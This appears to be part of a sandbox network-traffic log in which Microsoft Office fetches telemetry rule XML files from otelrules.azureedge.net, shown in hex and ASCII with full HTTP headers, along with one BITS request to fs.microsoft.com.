                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                          ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                          x-ms-request-id: 38a668eb-401e-00ac-34a1-3b0a97000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180150Z-15b8b599d88s6mj9hC1TEBur30000000030g00000000hnay
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:50 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          57192.168.2.54977313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:50 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:50 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                          ETag: "0x8DC582B9C710B28"
                                                                                                                                                                          x-ms-request-id: 7e801f10-e01e-003c-746c-3dc70b000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180150Z-15b8b599d889gj5whC1TEBfyk0000000034g000000007mrq
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:50 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          58192.168.2.54977113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:50 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:50 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                          x-ms-request-id: 1aaae978-201e-0096-4377-3bace6000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180150Z-178bfbc474b9xljthC1NYCtw9400000004r000000000arxm
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:50 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          59192.168.2.54977213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:50 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:50 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 471
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                          ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                          x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180150Z-174c587ffdfldtt2hC1TEBwv9c00000003500000000075tw
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:50 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          60192.168.2.54978013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:52 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:53 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:52 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                          ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                          x-ms-request-id: fdd62e6a-401e-0029-4ad1-3d9b43000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180152Z-15b8b599d88wn9hhhC1TEBry0g000000036g00000000nn92
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_MISS
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:53 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          61192.168.2.54978113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:52 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:52 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 477
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                          ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                          x-ms-request-id: 907655e5-001e-0065-594b-3c0b73000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180152Z-15b8b599d88wk8w4hC1TEB14b800000003cg000000003fn4
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:53 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          62192.168.2.54978313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:52 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:52 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                          ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                          x-ms-request-id: 0a397e49-e01e-0051-357f-3b84b2000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180152Z-174c587ffdf8fcgwhC1TEBnn7000000003gg0000000030qn
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:53 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          63192.168.2.54978213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:52 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:52 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                          ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                          x-ms-request-id: abcc4943-b01e-00ab-2315-3ddafd000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180152Z-178bfbc474b7cbwqhC1NYC8z4n00000004q000000000dq21
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:53 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          64192.168.2.54978413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:52 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:53 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                          ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                          x-ms-request-id: 6b17e566-f01e-003f-7a44-3cd19d000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180153Z-178bfbc474bxkclvhC1NYC69g400000004qg00000000dbg3
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:53 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          65192.168.2.5497922.23.161.164443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:54 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                          2024-11-23 18:01:55 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Server: Kestrel
                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                          X-Ms-Region: prod-eus-z1
                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                          X-OSID: 2
                                                                                                                                                                          X-CID: 2
                                                                                                                                                                          X-CCC: GB
                                                                                                                                                                          Cache-Control: public, max-age=228691
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:55 GMT
                                                                                                                                                                          Connection: close
                                                                                                                                                                          X-CID: 2


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          66192.168.2.54979013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:54 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:55 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 470
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                          ETag: "0x8DC582BBB181F65"
                                                                                                                                                                          x-ms-request-id: db5fa324-001e-00ad-2244-3c554b000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180155Z-174c587ffdf89smkhC1TEB697s000000038g00000000pkuw
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
